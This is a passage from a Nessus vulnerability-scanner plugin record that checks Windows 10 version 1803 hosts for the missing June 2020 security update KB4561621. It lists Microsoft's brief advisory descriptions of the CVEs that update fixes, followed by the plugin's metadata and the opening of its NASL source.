new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1238, CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the Windows Feedback Hub improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1199)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector fail to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1302, CVE-2020-1312)\n\n - An elevation of privilege vulnerability exists in the way the Windows Now Playing Session Manager handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1271)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the way that the Connected Devices Platform Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when Windows Kernel fails to properly sanitize certain parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-1257, CVE-2020-1278, CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Bluetooth Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could read memory that was freed and might run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability exists in Windows Security Health Service when handling certain objects in memory. (CVE-2020-1162, CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235, CVE-2020-1282, CVE-2020-1304, CVE-2020-1306, CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when Windows Host Guardian Service improperly handles hashes recorded and logged. An attacker who successfully exploited the vulnerability could tamper with the log file. In an attack scenario, an attacker can change existing event log types to a type the parsers do not interpret allowing an attacker to append their own hash without triggering an alert. The update addresses the vulnerability by correcting how Windows Host Guardian Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1274, CVE-2020-1276, CVE-2020-1316)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An information disclosure vulnerability exists in the way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this vulnerability could determine the origin of all webpages in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when Windows Lockscreen fails to properly load spotlight images from a secure location. An attacker who successfully exploited the vulnerability could execute commands with elevated permissions. An authenticated attacker could modify a registry value to exploit this vulnerability. The security update addresses the vulnerability by ensuring that the spotlight images are always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in OpenSSH for Windows when it does not properly restrict access to configuration settings. An attacker who successfully exploited this vulnerability could replace the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles objects in memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the Windows Shell does not properly validate file paths. An attacker who successfully exploited this vulnerability could run arbitrary code in the context of the current user. If the current user is logged on as an administrator, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with elevated privileges. Users whose accounts are configured to have fewer privileges on the system could be less impacted than users who operate with administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1258)", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561621: Windows 10 Version 1803 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1073", "CVE-2020-1160", "CVE-2020-1162", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1197", "CVE-2020-1199", "CVE-2020-1201", "CVE-2020-1202", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1211", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1217", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1222", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1232", "CVE-2020-1233", "CVE-2020-1234", "CVE-2020-1235", "CVE-2020-1236", "CVE-2020-1237", "CVE-2020-1238", "CVE-2020-1239", "CVE-2020-1241", "CVE-2020-1242", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1257", "CVE-2020-1258", "CVE-2020-1259", "CVE-2020-1260", "CVE-2020-1261", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1274", "CVE-2020-1276", "CVE-2020-1278", "CVE-2020-1279", "CVE-2020-1280", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1283", "CVE-2020-1286", "CVE-2020-1287", "CVE-2020-1290", "CVE-2020-1291", "CVE-2020-1292", "CVE-2020-1293", "CVE-2020-1294", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1304", "CVE-2020-1305", "CVE-2020-1306", "CVE-2020-1309", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1312", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1316", "CVE-2020-1317", "CVE-2020-1324", "CVE-2020-1334", "CVE-2020-1348"], "modified": "2023-03-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561621.NASL", "href": "https://www.tenable.com/plugins/nessus/137259", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137259);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/06\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1162\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1199\",\n \"CVE-2020-1201\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1217\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1222\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1233\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1237\",\n \"CVE-2020-1238\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1242\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1258\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1274\",\n \"CVE-2020-1276\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1280\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1286\",\n \"CVE-2020-1287\",\n \"CVE-2020-1290\",\n \"CVE-2020-1291\",\n \"CVE-2020-1292\",\n \"CVE-2020-1293\",\n \"CVE-2020-1294\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1306\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1312\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1324\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561621\");\n script_xref(name:\"MSFT\", value:\"MS20-4561621\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561621: Windows 10 Version 1803 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561621.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows Feedback Hub improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1199)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302,\n CVE-2020-1312)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1306,\n CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1274, CVE-2020-1276, CVE-2020-1316)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\");\n # https://support.microsoft.com/en-us/help/4561621/windows-10-update-kb4561621\n script_set_attribute(attribute:\"see_also\", 